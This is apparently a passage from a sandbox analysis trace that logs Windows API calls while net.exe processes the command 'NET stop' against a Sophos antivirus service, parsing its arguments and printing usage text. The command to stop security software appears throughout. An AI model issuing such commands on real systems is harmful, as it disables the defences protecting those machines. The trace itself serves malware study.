_String2="SYNTAX\r\nThe following c", _MaxCount=0x17) returned -5 [0210.386] LocalFree (hMem=0x269870) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 顰& ") returned 0xa86 [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="NAMES\r\nThe following ty", _MaxCount=0x17) returned 4 [0210.386] LocalFree (hMem=0x269870) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 顰& ") returned 0x54 [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos File", _String2="\r\nFor more information ", _MaxCount=0x17) returned 97 [0210.386] LocalFree (hMem=0x269870) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 顰& ") returned 0xad [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0210.386] LocalFree (hMem=0x269870) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 顰& ") returned 0x2e [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0210.386] LocalFree (hMem=0x263f80) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 㾀& ") returned 0x7d [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0210.386] LocalFree (hMem=0x269870) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 顰& ") returned 0x26 [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0210.386] LocalFree (hMem=0x263f80) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0210.386] LocalFree (hMem=0x263f80) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x1b [0210.386] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0210.386] LocalFree (hMem=0x263f80) returned 0x0 [0210.386] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 㾀& ") returned 0xbe [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0210.387] LocalFree (hMem=0x269870) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 顰& ") returned 0x33 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0210.387] LocalFree (hMem=0x263f80) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0210.387] LocalFree (hMem=0x263f80) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 㾀& ") returned 0xc1 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0210.387] LocalFree (hMem=0x269870) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 顰& ") returned 0x16 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0210.387] LocalFree (hMem=0x263f80) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x33 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0210.387] LocalFree (hMem=0x263f80) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="顰&⡋瓢 㾀& ") returned 0x234 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0210.387] LocalFree (hMem=0x269870) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 顰& ") returned 0x13 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0210.387] LocalFree (hMem=0x263f80) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0210.387] LocalFree (hMem=0x263f80) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0210.387] LocalFree (hMem=0x263f80) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0210.387] LocalFree (hMem=0x263f80) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0210.387] LocalFree (hMem=0x263f80) returned 0x0 [0210.387] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x16 [0210.387] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0210.388] LocalFree (hMem=0x263f80) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㶘&⡋瓢 㾀& ") returned 0x11 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0210.388] LocalFree (hMem=0x263d98) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㶘& ") returned 0x14 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0210.388] LocalFree (hMem=0x263f80) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x12 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0210.388] LocalFree (hMem=0x263f80) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0xf [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0210.388] LocalFree (hMem=0x263f80) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x17 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0210.388] LocalFree (hMem=0x263f80) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x18 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0210.388] LocalFree (hMem=0x263f80) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x2a [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0210.388] LocalFree (hMem=0x263f80) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0210.388] LocalFree (hMem=0x263f80) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 㾀& ") returned 0x58 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0210.388] LocalFree (hMem=0x26b870) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 롰& ") returned 0x184 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0210.388] LocalFree (hMem=0x26b870) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 롰& ") returned 0xc7 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0210.388] LocalFree (hMem=0x26b870) returned 0x0 [0210.388] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 롰& ") returned 0x47 [0210.388] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0210.388] LocalFree (hMem=0x26b870) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 롰& ") returned 0xc2 [0210.389] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0210.389] LocalFree (hMem=0x26b870) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 롰& ") returned 0x319 [0210.389] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0210.389] LocalFree (hMem=0x26b870) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 롰& ") returned 0x483 [0210.389] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0210.389] LocalFree (hMem=0x26b870) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 롰& ") returned 0xa86 [0210.389] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0210.389] LocalFree (hMem=0x26b870) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 롰& ") returned 0x54 [0210.389] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0210.389] LocalFree (hMem=0x26b870) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 롰& ") returned 0xad [0210.389] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0210.389] LocalFree (hMem=0x26b870) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 롰& ") returned 0x2e [0210.389] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0210.389] LocalFree (hMem=0x263f80) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 㾀& ") returned 0x7d [0210.389] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0210.389] LocalFree (hMem=0x26b870) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 롰& ") returned 0x26 [0210.389] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0210.389] LocalFree (hMem=0x263f80) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.389] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0210.389] LocalFree (hMem=0x263f80) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x1b [0210.389] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0210.389] LocalFree (hMem=0x263f80) returned 0x0 [0210.389] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 㾀& ") returned 0xbe [0210.389] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0210.390] LocalFree (hMem=0x26b870) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 롰& ") returned 0x33 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x19 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 㾀& ") returned 0xc1 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0210.390] LocalFree (hMem=0x26b870) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 롰& ") returned 0x16 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x33 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="롰&⡋瓢 㾀& ") returned 0x234 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0210.390] LocalFree (hMem=0x26b870) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 롰& ") returned 0x13 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x14 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x16 [0210.390] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.390] LocalFree (hMem=0x263f80) returned 0x0 [0210.390] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㶘&⡋瓢 㾀& ") returned 0x11 [0210.391] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.391] LocalFree (hMem=0x263d98) returned 0x0 [0210.391] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㶘& ") returned 0x14 [0210.391] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.391] LocalFree (hMem=0x263f80) returned 0x0 [0210.391] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x12 [0210.391] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.391] LocalFree (hMem=0x263f80) returned 0x0 [0210.391] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0xf [0210.391] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.391] LocalFree (hMem=0x263f80) returned 0x0 [0210.391] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x17 [0210.391] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.391] LocalFree (hMem=0x263f80) returned 0x0 [0210.391] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x18 [0210.391] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.391] LocalFree (hMem=0x263f80) returned 0x0 [0210.391] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x2a [0210.391] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0210.391] LocalFree (hMem=0x263f80) returned 0x0 [0210.391] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x20f60c, nSize=0x0, Arguments=0x20f608 | out: lpBuffer="㾀&⡋瓢 㾀& ") returned 0x15 [0210.391] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0210.391] GetFileType (hFile=0x26c) returned 0x3 [0210.391] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x20f624 | out: lpMode=0x20f624) returned 0 [0210.392] GetConsoleOutputCP () returned 0x1b5 [0210.392] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0210.392] malloc (_Size=0x16) returned 0x4d2748 [0210.392] GetConsoleOutputCP () returned 0x1b5 [0210.392] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x4d2748, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0210.392] WriteFile (in: hFile=0x26c, lpBuffer=0x4d2748, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x20f628, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f628, lpOverlapped=0x0) returned 0 [0210.392] free (_Block=0x4d2748) 